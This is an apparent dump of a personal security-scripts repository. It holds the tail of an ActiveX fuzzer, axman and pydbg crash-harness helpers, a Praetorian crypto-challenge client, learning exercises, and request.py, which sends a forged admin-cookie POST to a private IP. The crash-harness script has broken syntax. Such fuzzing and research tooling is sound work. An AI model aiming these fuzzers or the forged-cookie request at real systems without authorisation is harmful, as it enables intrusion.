+ f['Name']);\n\t\t} catch(e) {}\n\t\t// Iterate through all evilProp string values\n\t\tfor (var x in evilPropStr) {\n\t\t\tvar tst = evilPropStr[x];\n\t\t\t// Tracer magic\n\t\t\tif (tst.toString().indexOf(magic) != -1) {\n\t\t\t\tvar tcls = clsid.toString();\n\t\t\t\ttcls = tcls.replace(\"{\", \"\");\n\t\t\t\ttcls = tcls.replace(\"}\", \"\");\n\t\t\t\ttst = tst.toString() + '_' + tcls + '_' + f['Name'];\n\t\t\t}\n\t\t\twindow.status = clsid + \" PropSet (String) \" + f['Name'] + ' = ' + tst.length;\n\t\t\tmethod = \"fuzzStringProperties2\";\n\t\t\ttry {\n\t\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\t\talert(method);\n\t\t\t\teval('obj.' + f['Name'] + '= tst');\n\t\t\t} catch(e) {}\n\t\t}\n\t\t// Restore the original property value\n\t\twindow.status = clsid + \" PropSet (String) \" + f['Name'] + ' = (old) ' + old;\n\t\tmethod = \"fuzzStringProperties3\";\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('obj.' + f['Name'] + '= old');\n\t\t} catch(e) {}\n\t}\n}\n\nfunction fuzzObjectProperties(obj) {\n\tvar fs = ax[clsid]['Functions'];\n\tif (! fs)\n\t\treturn;\n\tfor (var i = 0; i < ax[clsid]['FunctionCount']; i++) {\n\t\tvar f = fs[i];\n\t\t// Skip all methods but the properties\n\t\tif (! (f && f['Name'] && (f['Type'] == 'PropPut' || f['Type'] == 'PropPutRef')))\n\t\t\tcontinue;\n\t\twindow.status = clsid + \" PropSet (String) \" + f['Name'];\n\t\tmethod = \"fuzzObjectProperties\";\n\t\t// Read the old value so we can restore it\n\t\tvar old = null;\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('old = obj.' + f['Name']); }\n\t\tcatch(e) {}\n\n\t\t// Iterate through all evilProp object values\n\t\tfor (var x in evilPropObj) {\n\t\t\tvar tst = evilPropObj[x];\n\t\t\twindow.status = clsid + \" PropSet (String) \" + f['Name'] + ' = ' + x;\n\t\t\tmethod = \"fuzzObjectProperties2\";\n\t\t\ttry {\n\t\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\t\talert(method);\n\t\t\t\teval('obj.' + f['Name'] + '= tst');\n\t\t\t} catch(e) {}\n\t\t}\n\t\t// Restore the original property value\n\t\twindow.status = clsid + \" PropSet (String) \" + f['Name'] + ' = (old) ' + old;\n\t\tmethod = \"fuzzObjectProperties3\";\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('obj.' + f['Name'] + '= old');\n\t\t} catch(e) {}\n\t}\n}\n\nfunction fuzzMethods(obj) {\n\tvar fs = ax[clsid]['Functions'];\n\tif (! fs)\n\t\treturn;\n\tfor (var i = 0; i < ax[clsid]['FunctionCount']; i++) {\n\t\tvar f = fs[i];\n\t\t// Skip all the properties\n\t\tif (! (f && f['Name'] && ! f['Type']))\n\t\t\tcontinue;\n\n\t\twindow.status = clsid + \" Method (Init) \" + f['Name'];\n\t\tmethod = \"fuzzMethods\";\n\t\tcreateEvilMethArgs(f['ArgCount']);\n\t\tfuzzMethodArgs(obj, f['Name'], f['ArgCount'], new Array());\n\t\tdestroyEvilMethArgs();\n\t}\n}\n// This routine should be unrolled and use setTimeout()\nfunction fuzzMethodArgs(obj, meth, argc, argv) {\n\tvar tStr = 0;\n\tvar tNum = 1;\n\tvar tObj = 2;\n\t// Arguments are set, make the call\n\tif (! 
argc || argc == 0) {\n\t\tvar mcall = 'obj.' + meth + '(';\n\t\tvar targv = new Array();\n\t\tvar info = mcall;\n\t\tfor (var aidx = 0; aidx < argv.length; aidx++) {\n\t\t\tif (aidx > 0) {\n\t\t\t\tmcall += ', ';\n\t\t\t\tinfo += ',';\n\t\t\t}\n\t\t\tif (argv[aidx][0] == tStr) {\n\t\t\t\ttargv[aidx] = evilMethStr[argv[aidx][1]].toString();\n\t\t\t\t// Tracer magic\n\t\t\t\tif (evilMethStr[argv[aidx][1]].toString().indexOf(magic) != -1) {\n\t\t\t\t\tvar tcls = clsid.toString();\n\t\t\t\t\ttcls = tcls.replace(\"{\", \"\");\n\t\t\t\t\ttcls = tcls.replace(\"}\", \"\");\n\t\t\t\t\ttargv[aidx] = targv[aidx] + '_' + tcls + '_' + meth;\n\t\t\t\t}\n\t\t\t\tinfo += 'evilMethStr[' + argv[aidx][1] + ']('+targv[aidx].length+')';\n\t\t\t\tmcall += 'targv[' + aidx + ']';\n\t\t\t}\n\t\t\telse if (argv[aidx][0] == tNum) {\n\t\t\t\ttargv[aidx] = evilMethNum[argv[aidx][1]];\n\t\t\t\tinfo += ' evilMethNum[' + argv[aidx][1] + ']('+targv[aidx]+')';\n\t\t\t\tmcall += 'targv[' + aidx + ']';\n\t\t\t}\n\t\t\telse if (argv[aidx][0] == tObj) {\n\t\t\t\tinfo += ' evilMethObj[' + argv[aidx][1] + ']('+typeof(argv[aidx][0])+')';\n\t\t\t\ttargv[aidx] = evilMethObj[argv[aidx][1]];\n\t\t\t\tmcall += 'targv[' + aidx + ']';\n\t\t\t} else {\n\t\t\t\t// ERROR CONDITION\n\t\t\t\tthrow(\"Invalid argument type\");\n\t\t\t}\n\t\t}\n\t\tmcall += ')';\n\t\tinfo += ')';\n\t\t// Write this to the status bar\n\t\twindow.status = clsid + ' ' + info;\n\t\tmethod = \"fuzzMethodArgs\";\n\t\t// Execute the method\n\t\ttry { eval(mcall); } catch(e) { }\n\t\t// alert(mcall);\n\t\treturn(0);\n\t}\n\t// Simple test for many-argument methods\n\tif (argv.length == 0 && (argc > evilMethSlowMax || argc < evilMethSlowMin)) {\n\t\t// Numeric testing\n\t\tfor (var eidx in evilMethNum) {\n\t\t\tvar argx = new Array();\n\t\t\tfor (var x = 0; x < argc; x++)\n\t\t\t\targx[x] = new Array(tNum, eidx);\n\n\t\t\tfuzzMethodArgs(obj, meth, 0, argx);\n\t\t}\n\t\t// String testing\n\t\tfor (var eidx in evilMethStr) {\n\t\t\tvar argx = new Array();\n\t\t\tfor (var x = 0; x < argc; x++)\n\t\t\t\targx[x] = new Array(tStr, eidx);\n\n\t\t\tfuzzMethodArgs(obj, meth, 0, argx);\n\t\t}\n\t\t// Object testing\n\t\tfor (var eidx in evilMethObj) {\n\t\t\tvar argx = new Array();\n\t\t\tfor (var x = 0; x < argc; x++)\n\t\t\t\targx[x] = new Array(tObj, eidx);\n\n\t\t\tfuzzMethodArgs(obj, meth, 0, argx);\n\t\t}\n\t\treturn(0);\n\t}\n\t// Slow mode testing - all permutations of args\n\t// Copy current args\n\tvar argx = new Array();\n\tfor (var argi in argv) argx[argi] = argv[argi];\n\t// What index does this level set?\n\tvar argi = argx.length;\n\t// Numeric testing\n\tfor (var eidx in evilMethNum) {\n\t\targx[argi] = new Array(tNum, eidx);\n\t\tfuzzMethodArgs(obj, meth, argc - 1, argx);\n\t}\n\t// String testing\n\tfor (var eidx in evilMethStr) {\n\t\targx[argi] = new Array(tStr, eidx);\n\t\tfuzzMethodArgs(obj, meth, argc - 1, argx);\n\t}\n\t// Object testing\n\tfor (var eidx in evilMethObj) {\n\t\targx[argi] = new Array(tObj, eidx);\n\t\tfuzzMethodArgs(obj, meth, argc - 1, argx);\n\t}\n}" }, { "alpha_fraction": 0.5759327411651611, "alphanum_fraction": 0.5937992930412292, "avg_line_length": 20.873563766479492, "blob_id": "2a35f49d769b2368c428ae1647fdb324737d43f2", "content_id": "49575eb1c4f40ad063b08c327a711d2cc99512e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1903, "license_type": "no_license", "max_line_length": 139, "num_lines": 87, "path": "/ruby/crypto.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": 
"UTF-8", "text": "require 'rest-client'\nrequire 'json'\nrequire 'pp'\nrequire 'base64'\n\nclass CryptoAPI\n\n def initialize(email)\n @base = 'http://*c*r*y*p**to**.pr**aetor**i*an.*com'\n @email = email\n @token = self.token\n end\n\n def token\n data = {'email' => @email}.to_json\n ret = RestClient.post \"#{@base}/api-token-auth/\", data, :content_type => :json, :accept => :json\n JSON.parse(ret)['token']\n end\n\n def fetch(level)\n ret = RestClient.get \"#{@base}/challenge/#{level}/\", :content_type => :json, :accept => :json, :Authorization => \"JWT #{@token}\"\n JSON.parse(ret)\n end\n\n def solve(level, guess)\n data = {'guess' => guess}\n ret = RestClient.post \"#{@base}/challenge/#{level}/\", data, :content_type => :json, :accept => :json, :Authorization => \"JWT #{@token}\"\n JSON.parse(ret)\n end\n\n def status\n ret = RestClient.get \"#{@base}/hash/\", :content_type => :json, :accept => :json, :Authorization => \"JWT #{@token}\"\n JSON.parse(ret)\n end\n\nend\n\n# Class values\n# Declare Class\ncrypto = CryptoAPI.new('blah')\n\n# Fetch level \nlevel = 3\npp data = crypto.fetch(level)\n\n# Caesar Cipher 3 - 4 Level 1\n#-----------\n#-----------\n#guess = []\n\n#data['challenge'].split(//).each do |char|\n # num = char.ord\n # -- needed to convert lowercase xyz manually bc they are converted to weird symbols\n #if num == 120 #x\n #num = 97\n #elsif num == 121 #y\n #num = 98\n #elsif num == 122 #z\n #num = 99\n #else\n #num += 3\n #end\n #char = num.chr\n #guess << char\n#end\n\n#pp guess = guess.join\n#----------\n#----------\n\n# Base64 Level 2\n# laughable i know\n# guess = data['challenge'].split(',')\n\n# guess = Base64.decode64(guess[1])\n# was more code here but it magically disappeared\n# guess = guess[-50..-17]\n\n# pp guess\n\npp guess\npp crypto.solve(level, guess)\npp d = crypto.status\n\nputs '*P*r*&aetor**ian C*ryp*t*o C**hal**lenge'\nputs \" Level: #{d['level']}\"\nputs \" Hash: #{d['hash']}\"\n" }, { "alpha_fraction": 0.5557655692100525, "alphanum_fraction": 0.5727788209915161, "avg_line_length": 17.275861740112305, "blob_id": "9de413a5013723dd95b48a4a653d3182ccb0f275", "content_id": "a628b4dde74af0e786c675be457fa37cbf1a6114", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 529, "license_type": "no_license", "max_line_length": 58, "num_lines": 29, "path": "/python/Module-2/processes.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\n\nimport os\n\n\ndef child_process():\n\n print(\"I am the child & my pid is: %d\" % os.getpid())\n print(\"child is exiting\")\n\n\ndef parent_process():\n\n print(\"I am the parent & my pid is: %d\" % os.getpid())\n childpid = os.fork()\n\n if childpid == 0:\n #we are inside child\n child_process()\n else:\n #we are inside the parent process\n print(\"inside parent\")\n print(\"our child has the pid: %d\" % childpid)\n\n\nparent_process()\n\nos.execvp(\"ping\", [\"ping\", \"127.0.0.1\"])" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6814814805984497, "avg_line_length": 15.875, "blob_id": "c6cc28dc1e3dc5c8e3a7ad5f4e6eacd1691afc28", "content_id": "655a65244cf9ffca9496457f01a6541e57dcd2c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 135, "license_type": "no_license", "max_line_length": 47, "num_lines": 8, "path": "/python/Module-2/subprocess.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport 
subprocess\n\n__author__ = 'ma11ock'\n\n# subprocess example\n\nfiles = subprocess.check_output(['ls']).split('\\n')\n" }, { "alpha_fraction": 0.5928366780281067, "alphanum_fraction": 0.6011461615562439, "avg_line_length": 25.846153259277344, "blob_id": "99012f7502bd5764bde6ec13503fee30e26f2217", "content_id": "e57e8564a509d659f856a4c36b172a2a0c37c99c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6980, "license_type": "no_license", "max_line_length": 76, "num_lines": 260, "path": "/FaX/html/comfuncs.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\r\nfrom _winreg import *\r\nimport os, subprocess, shutil, filecmp, re\r\nfrom shutil import copy\r\nfrom filecmp import dircmp\r\n\r\n# def get_clsids():\r\n # #read all clsids from registry\r\n # areg = ConnectRegistry(None,HKEY_CLASSES_ROOT)\r\n # akey = OpenKey(areg, r\"CLSID\")\r\n # i = 1\r\n # clsids = []\r\n # while True:\r\n \t# try:\r\n \t\t# tmp = EnumKey(akey, i)\r\n \t\t# clsids.append(tmp)\r\n \t\t# i +=1\r\n \t# except WindowsError as e:\r\n \t\t# print \"[+] Finish reading all CLSIDs...\"\r\n \t\t# break\r\n\r\n # return clsids\t\t\r\n \r\n\r\n# def save_clsids_file(file_name):\r\n\t# #save the clisid to a file\r\n\t# clsids = get_clsids()\r\n\t# try:\r\n\t\t# f = open(file_name, 'w')\r\n\t# except IOError:\r\n\t\t# print \"Error: File %s open error\" % file_name\r\n\t\t# return 0\t\r\n\r\n\t# for item in clsids:\r\n\t\t# print >>f, item\r\n\t\t\r\n\r\n# def diff_clsid_files(baseline_clsids, new_clsids, diff_result):\r\n\t# #diff two clsid files and save to diff_result js file\r\n\t# #all clsids are saved in an array in js file\r\n\t# clsids = []\r\n\t# if filecmp.cmp(baseline_clsids, new_clsids):\r\n\t\t# print \"[-] No new clsid found...\"\r\n\t\t# return 0\r\n\r\n\t# try:\r\n\t\t# f_base = open(baseline_clsids, 'r')\r\n\t# except IOError:\r\n\t\t# print \"Error: File %s open error\" % baseline_clsids\r\n\t\t# return 0\t\r\n\r\n\t# try:\r\n\t\t# f_new = open(new_clsids, 'r')\r\n\t# except IOError:\r\n\t\t# print \"Error: File %s open error\" % new_clsids\r\n\t\t# return 0\r\n\r\n\t# try:\r\n\t\t# f_diff = open(diff_result, 'w')\t\r\n\t# except IOError:\r\n\t\t# print \"Error: File %s open error\" % file_name\r\n\t\t# return 0\r\n\r\n\t# base_lines = f_base.readlines()\r\n\t# new_lines = f_new.readlines()\r\n\r\n\t# global CID\r\n\t# CID = clsids\r\n\t# #read clsid diff\r\n\t# for item in new_lines:\r\n\t\t# if item not in base_lines:\r\n\t\t\t# clsids.append(item.rstrip('\\n'))\r\n\t\t\r\n # # create object.js file\r\n\t# f_diff.write(\"var ax_objects = new Array(\\n\")\r\n\t# f_diff.write(\"'CLSID',\\n\")\t\r\n\t# for item in clsids[0:-1]:\r\n\t\t# f_diff.write(\"'%s',\\n\" % item)\r\n\r\n\t# #no , follow last clsid\t\r\n\t# f_diff.write(\"'%s'\\n\" % clsids[-1])\t\r\n\t# f_diff.write(\"};\")\r\n\r\n#match clsid pattern with a string\r\ndef match_clsid_pattern(line):\r\n\tif re.match(r'\\{\\w{8}-\\w{4}-\\w{4}-\\w{4}-\\w{12}\\}.js', line):\r\n\t\tline = line.rstrip('\\n').rstrip(',').replace(\"'\",\"\")\t\r\n\t\treturn line\r\n\r\n\r\n#generate js file for each clsid\t\r\n# def generate_clsid_js_file(diff_result):\r\n\t# clsids = []\r\n\t# try:\r\n\t\t# f_diff = open(diff_result, 'r')\t\r\n\t# except IOError:\r\n\t\t# print \"Error: File %s open error\" % file_name\r\n\t\t# return 0\r\n\r\n\t# lines = f_diff.readlines()\r\n\r\n\t# for line in lines:\r\n\t\t# item = match_clsid_pattern(line)\r\n\t\t# if item is not 
None:\r\n\t\t\t# clsids.append(item)\r\n\r\n\r\n\t# #read registry to find entry match the clsid\r\n\t# try:\r\n\t\t# areg = ConnectRegistry(None,HKEY_CLASSES_ROOT)\r\n\t# except WindowsError as e:\r\n\t\t# print \"[-] ConnectRegistry failed ...\"\r\n\t\t# exit(0)\r\n\r\n\t# try:\r\n\t\t# akey = OpenKey(areg, r\"CLSID\")\r\n\t# except WindowsError as e:\r\n\t\t# print \"[-] OpenKey CLSID failed ...\"\r\n\t\t# exit(0)\r\n\r\n\t# i = 1\r\n\t# while True:\r\n\t\t# try:\r\n\t\t\t# tmp = EnumKey(akey, i)\r\n\t\t\t# if tmp in clsids:\r\n\t\t\t\t# try:\r\n\t\t\t\t\t# subkey = OpenKey(akey, tmp)\r\n\t\t\t\t# except WindowsError as e:\r\n\t\t\t\t\t# print \"[-] OpenKey %s failed ...\" % tmp\r\n\t\t\t\t\t# continue\r\n\t\t\t\t# try:\t \t\r\n\t\t\t\t\t# subsubkey = OpenKey(subkey, r\"InprocServer32\")\r\n\t\t\t\t# except WindowsError as e:\r\n\t\t\t\t\t# print \"[-] OpenKey InprocServer32 failed ...\"\r\n\t\t\t\t\t# continue\t\r\n\t\t\t\t# try:\r\n\t\t\t\t\t# server = QueryValue(subsubkey, \"\")\r\n\t\t\t\t# except WindowsError as e:\r\n\t\t\t\t\t# print \"[-] QueryValue InprocServer32 failed ...\"\r\n\t\t\t\t\t# continue\r\n\t\t\t\t# #create js file now...\r\n\t\t\t\t# create_clsid_js(server, tmp)\t\t\r\n\t\t\t# i +=1\r\n\t\t# except WindowsError as e:\r\n\t\t\t# print \"[+] Finish reading all CLSIDs...\"\r\n\t\t\t# break\r\n\r\n\r\n# def create_clsid_js(server, clsid):\r\n\t# file_name = \"html//conf//\" + clsid + \".js\"\r\n\t# try:\r\n\t\t# clsid_js = open(file_name, 'w')\t\r\n\t# except IOError:\r\n\t\t# print \"Error: File %s open error\" % clsid\r\n\t\t# return 0\r\n\t# #start to write the content to the file\t\r\n\t# clsid_js.write(\"var ax_name = '%s';\\n\" % clsid)\r\n\t# clsid_js.write(\"ax[ax_name] = new Array();\\n\")\r\n\t# clsid_js.write(\"ax[ax_name]['Server'] = '%s';\\n\" % server)\r\n\t\r\n# diff_clsid_files(\"clisid.txt\", \"new.txt\", \"diff_result.js\")\r\n# generate_clsid_js_file(\"diff_result.js\")\r\n\r\n\r\ndef create_objects_js(save_dir):\r\n\tfile_name = save_dir + \"\\\\objects.js\"\r\n\r\n\ttry:\r\n\t\tobjects = open(file_name, 'w')\r\n\texcept IOError:\r\n\t\tprint \"Error: File %s open error\" % file_name\r\n\t\treturn 0\r\n\r\n\t#write objects.js content:\r\n\tobjects.write(\"var ax_objects = new Array(\\n\")\r\n\tobjects.write(\"'CLSID',\\n\")\r\n\t\r\n\tfor files in os.listdir(save_dir):\r\n\t\tif match_clsid_pattern(files):\r\n\t\t\tobjects.write(\"'\" + files[0:-3] + \"',\" + \"\\n\")\r\n\r\n\t#remove last item's ,\r\n\tobjects.seek(-3, os.SEEK_END)\r\n\tobjects.truncate()\t\t\r\n\tobjects.write(\"\\n);\")\t\r\n\r\n\r\ndef run_axman(axman_path, js_file_folder):\r\n\t#change the axman.exe path\r\n\taxman = axman_path +\"\\\\\" + \"axman.exe\"\r\n\tsubprocess.call([axman, js_file_folder])\r\n\r\n\r\n# def copy_diff_files(dcmp, save_dir):\r\n\t# for name in dcmp.diff_files:\r\n\t\t# subprocess.call([\"copy\", dcmp.right,name, save_dir])\r\n\t\t# #os.system('copy %s\\\\%s %s' %(dcmp.right,name, save_dir))\r\n\t\t# print \"diff_file %s found in %s and %s\" % (name, dcmp.left, dcmp.right)\r\n\r\n\r\n#run axman first time, get baseline\r\ndef baseline_generate(axman_path, js_file_folder1):\r\n\tprint \"[+] running axman\"\r\n\tprint \"[+] generating baseline\"\r\n\trun_axman(axman_path, js_file_folder1)\r\n\t\r\n\r\n#diff js files \r\ndef diff_js_files(js_file_folder1, js_file_folder2):\r\n\tdir1_list = []\r\n\tdir2_list = []\r\n\r\n\tfor files in os.listdir(js_file_folder1):\r\n\t\tif match_clsid_pattern(files):\r\n\t\t\tdir1_list.append(files)\r\n\r\n\tfor files in 
os.listdir(js_file_folder2):\r\n\t\tif match_clsid_pattern(files):\r\n\t\t\tdir2_list.append(files)\t\r\n\r\n\tresult = set(dir1_list) ^ set(dir2_list)\r\n\r\n\treturn result\t\r\n\r\n#run axman second time, get all objects, diff \r\ndef diff_generate(axman_path, js_file_folder1, js_file_folder2, save_dir):\r\n\tif not os.path.exists(axman_path):\r\n\t\tprint \"axman path error\"\r\n\t\texit(1)\r\n\tif not os.path.exists(js_file_folder1):\r\n\t\tprint \"baseline js file folder error\"\r\n\t\texit(1)\r\n\tif not os.path.exists(js_file_folder2):\r\n\t\tos.mkdir(js_file_folder2)\r\n\tif not os.path.exists(save_dir):\r\n\t\tos.mkdir(save_dir)\t\r\n\r\n\tprint \"[+] running axman\"\r\n\tprint \"[+] generating target files\"\r\n\trun_axman(axman_path, js_file_folder2)\r\n\r\n\t#diff js files here\r\n\tdiff = diff_js_files(js_file_folder1, js_file_folder2)\r\n\t\r\n\tfor files in diff:\r\n\t\tsrc = js_file_folder2 + \"\\\\\" + files\t\r\n\t\tdst = save_dir\r\n\t\tprint \"[+] copying \" + files + \"\\n - to \" + dst\r\n\t\tcopy(src,dst)\r\n\t\t#os.system('copy %s\\\\%s %s\\\\%s' %(js_file_folder2, files, save_dir,files))\r\n\r\n\t#create new objects.js\r\n\tcreate_objects_js(save_dir)\r\n\r\n\t#copy CLSID.js to save_dir\r\n\tsrc_clsid = js_file_folder2 + \"\\\\\" + \"CLSID.js\"\r\n\tdst_clsid = save_dir\r\n\tprint \"[+] copying \" + src_clsid + \"\\n - to \" + dst_clsid\r\n\tcopy(src_clsid,dst_clsid)\r\n\t#os.system('copy %s\\\\CLSID.js %s\\\\CLSID.js' %(js_file_folder2, save_dir))\r\n" }, { "alpha_fraction": 0.5470967888832092, "alphanum_fraction": 0.6161290407180786, "avg_line_length": 36.80487823486328, "blob_id": "0d1b95511070ed68fc0d6c116989669acc41bed7", "content_id": "575513cdaa3bf5e02150b226268894ce16df6cf3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1550, "license_type": "no_license", "max_line_length": 136, "num_lines": 41, "path": "/python/request.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# send a POST/ data to an ip address/port\nimport socket, sys\nimport random\n\ndef create_attack():\n buf = ''\n num = random.randrange(25,101)\n\n for i in range(num):\n alpha = random.randrange(7,127)\n buf += chr(alpha)\n\n buffer =\"POST https://10.219.101.161/jsonrpc/get_value HTTP/1.0\\r\\n\"\n buffer += \"Host: 10.219.101.161\\r\\n\"\n buffer += \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)\\r\\n\"\n buffer += \"Pragma: no-cache\\r\\n\"\n buffer += \"X-Requested-With: XMLHttpRequest\\r\\n\"\n buffer += \"Referrer: https://10.219.101.161/index.html\\r\\n\"\n buffer += \"Cookie: testme=cookie; uid=admin; sessid_443=sess5CeHMY7jf/ecTE00MNCzgA==\\r\\n\\r\\n\"\n buffer += '{\"jsonrpc\": \"2.0\",\"id\": 3,\"method\": \"get_value\",\"params\":{\"th\": \"th\",\"path\": \"/users:users/current_user/privlevel\"}}\\r\\n'\n\n # buffer = 'POST /jsonrpc/login HTTP/1.0\\r\\n'\n # buffer += 'Host: 10.219.101.161\\r\\n'\n # buffer += 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)\\r\\n'\n # buffer += 'Pragma: no-cache\\r\\n'\n # buffer += 'Referer: https://10.219.101.161/login.html\\r\\n'\n # buffer += 'Cookie: testme=cookie; uid=admin\\r\\n'\n # buffer += 'Connection: keep-alive\\r\\n\\r\\n'\n\n #buffer += '{\"jsronrpc\":\"2.0\",\"id\":1,\"method\":\"login\",\"params\":{\"user\":\"admin\",\"passwd\":\"\"}}'\n print buffer\n return buffer\n\ndef send_attack():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((\"10.219.101.161\",443))\n 
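comfuncs.py's diff_js_files above boils down to one set operation: symmetric difference, the items present in exactly one of the two folders. In isolation (filenames invented for the demo):

baseline = {"a.js", "b.js", "CLSID.js"}
current = {"a.js", "CLSID.js", "new-control.js"}

print(baseline ^ current)   # set(['b.js', 'new-control.js']) - order may vary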
sock.send(create_attack())\n    sock.close()\n\nsend_attack()\n" }, { "alpha_fraction": 0.6345381736755371, "alphanum_fraction": 0.6385542154312134, "avg_line_length": 18.153846740722656, "blob_id": "8db4d6f7c9fc1a02d8d3a703fc80668fbf3917e8", "content_id": "47cead49d97ec638897a57e3140cfd6b9005d745", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 249, "license_type": "no_license", "max_line_length": 37, "num_lines": 13, "path": "/python/dumpmodules.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys, pefile\n\nprint \"./script path/to/file\"\n\n# not pretty just has to work!\nfile=sys.argv[1]\npe=pefile.PE(file)\n\nprint '[+] Imported DLLs [+]'\nfor dll in pe.DIRECTORY_ENTRY_IMPORT:\n    print '[+] ' , dll.dll, ' [+]'\n" }, { "alpha_fraction": 0.6504030823707581, "alphanum_fraction": 0.6537972092628479, "avg_line_length": 24.344085693359375, "blob_id": "fd831deb430b1a69c4e88d5dce745775e8dc9ec9", "content_id": "9ebe6275b6575362229e0548281190f1dd5d9924", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2357, "license_type": "no_license", "max_line_length": 92, "num_lines": 93, "path": "/FaX/html/pydbg_script.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "# pydbg_script.py\n\nimport sys\nimport os\nfrom os import *\nimport pydbg\nfrom pydbg import *\nfrom pydbg.defines import *\nimport shutil\nfrom threading import Timer\n\nif len(sys.argv) < 6:\n\tprint \"USAGE: \" + sys.argv[0] + \" <prog> <file_to_open> <log_dir> <timeout> <info> <clsid>\"\n\tsys.exit()\n\ndef create_crash_log(pydbg):\n\tcontext = pydbg.dump_context()\n\teip = hex(pydbg.context.Eip)\n\tactual_log_dir = log_dir + \"\\\\eip_\" + eip\n\tif not os.path.exists(actual_log_dir):\n\t\tos.makedirs(actual_log_dir)\n\tlog_name = clsid + \".crash\"\n\tlog = file(actual_log_dir + \"\\\\\" + log_name, \"w\")\n\tlog.write(\"-------------------\\n\")\n\tlog.write(\" INFO\\n\")\n\tlog.write(\"-------------------\\n\")\n\tlog.write(\"\\n\\n\")\n\tlog.write(info + \"\\n\")\n\tlog.write(\"\\n\\n\")\n\tlog.write(\"-------------------\\n\")\n\tlog.write(\" CONTEXT\\n\")\n\tlog.write(\"-------------------\\n\")\n\tlog.write(\"\\n\\n\")\n\tlog.write(context)\n\tlog.close()\n\tshutil.copy(file_to_open, actual_log_dir + \"\\\\\" + os.path.basename(file_to_open))\n\ndef access_violation_handler(pydbg):\n\tprint \"[+] access violation! 
(CRASH)\"\n\ttimer.cancel()\n\tcreate_crash_log(pydbg)\n\tpydbg.terminate_process()\n\tf = open(\"blacklist.js\",'r')\n\t\tfiledata = f.read()\n\t\tf.close()\n\t\tif 'placeholder' in filedata:\n\t\t\tnewdata = filedata.replace(\"placeholder\",clsid)\n\t\telse\n\t\t\tnewdata = filedata.replace(\")\",\"'\"+clsid+\"')\")\n\t\tf = open(\"blacklist.js\",'w')\n\t\tf.write(newdata)\n\t\tf.close()\n\treturn DBG_CONTINUE\n\ndef process_quit_handler(pydbg):\n\tprint \"[+] program quit!\"\n\ttimer.cancel()\n\treturn DBG_CONTINUE\n\ndef first_breakpoint(pydbg):\n\tif pydbg.first_breakpoint:\n\t\tpydbg.set_callback(EXCEPTION_ACCESS_VIOLATION, access_violation_handler)\n\t\tpydbg.set_callback(EXIT_PROCESS_DEBUG_EVENT, process_quit_handler)\n\n\treturn DBG_CONTINUE\n\ndef timeout_handler():\n\tprint \"[+] \" + os.path.basename(program) + \" timedout!\"\n\tdbg.terminate_process()\n\n\nprogram = sys.argv[1]\nfile_to_open = sys.argv[2]\nlog_dir = sys.argv[3]\ntimeout = float(sys.argv[4])\ninfo = sys.argv[5]\nclsid = sys.argv[6]\n\nif not os.path.exists(log_dir):\n\tos.makedirs(log_dir)\n\ndbg = pydbg()\nprint \"[+] setting initial breakpoint\"\ndbg.set_callback(EXCEPTION_BREAKPOINT, first_breakpoint)\nprint \"[+] loading & attaching to program...\"\ndbg.load(program, file_to_open)\nprint \"[+] starting timeout timer\"\ntimer = Timer(timeout, timeout_handler)\ntimer.start()\nprint \"[+] running...\"\ndbg.run()\n\nprint \"[+] Done!\"\n" }, { "alpha_fraction": 0.595588207244873, "alphanum_fraction": 0.6060924530029297, "avg_line_length": 16.629629135131836, "blob_id": "cc4843bdecf099932759000404a9ea15471553bc", "content_id": "e62dc02ac9e4162d28958242825c31cef619722d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 952, "license_type": "no_license", "max_line_length": 82, "num_lines": 54, "path": "/python/Module-1/classes.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\n\nclass Calculator:\n\n def __init__(self, ina, inb):\n self.a = ina\n self.b = inb\n\n def add(self):\n\n return self.a + self.b\n\n def multiply(self):\n\n return self.a * self.b\n\n\nclass Scientific(Calculator):\n\n def power(self):\n\n return pow(self.a, self.b)\n\ndef quick_add(a, b):\n\n return a + b\n\nnewCalculation = Calculator(10, 20)\nnewPower = Scientific(2, 3)\n\nprint('a+b: %d' % newCalculation.add())\nprint('a*b: %d' % 